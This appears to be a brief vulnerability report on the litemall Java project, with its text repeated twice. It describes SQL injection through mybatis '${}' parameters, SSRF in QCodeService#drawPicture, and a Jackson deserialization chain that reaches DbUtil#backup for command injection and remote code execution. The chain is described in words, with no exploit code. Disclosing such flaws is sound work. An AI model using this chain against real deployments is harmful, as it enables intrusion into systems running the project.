Don't rely too much on mybatis generator,It brings SQL injection.
In addition,receiving parameters with "${}" will prevent mybatis from executing SQL in precompiled form,this leads to SQL injection risk.
2.
In org.linlinjava.litemall.core.qcode.QCodeService#drawPicture, push an unchecked URL into ImageIO.read will cause SSRF.There are two sources can flow to this sink.
3.
The version of Jackson used in the project is vulnerable,and multiple sources can flow to the sink which in org.linlinjava.litemall.core.util.JacksonUtil#toMap.
Through unsafe deserialization, you can call org.linlinjava.litemall.db.util.DbUtil#backup by reflection and inject custom commands into String db, finally case RCE.
1.
Don't rely too much on mybatis generator,It brings SQL injection.
In addition,receiving parameters with "${}" will prevent mybatis from executing SQL in precompiled form,this leads to SQL injection risk.
2.
In org.linlinjava.litemall.core.qcode.QCodeService#drawPicture, push an unchecked URL into ImageIO.read will cause SSRF.There are two sources can flow to this sink.
3.
The version of Jackson used in the project is vulnerable,and multiple sources can flow to the sink which in org.linlinjava.litemall.core.util.JacksonUtil#toMap.
Through unsafe deserialization, you can call org.linlinjava.litemall.db.util.DbUtil#backup by reflection and inject custom commands into String db, finally case RCE.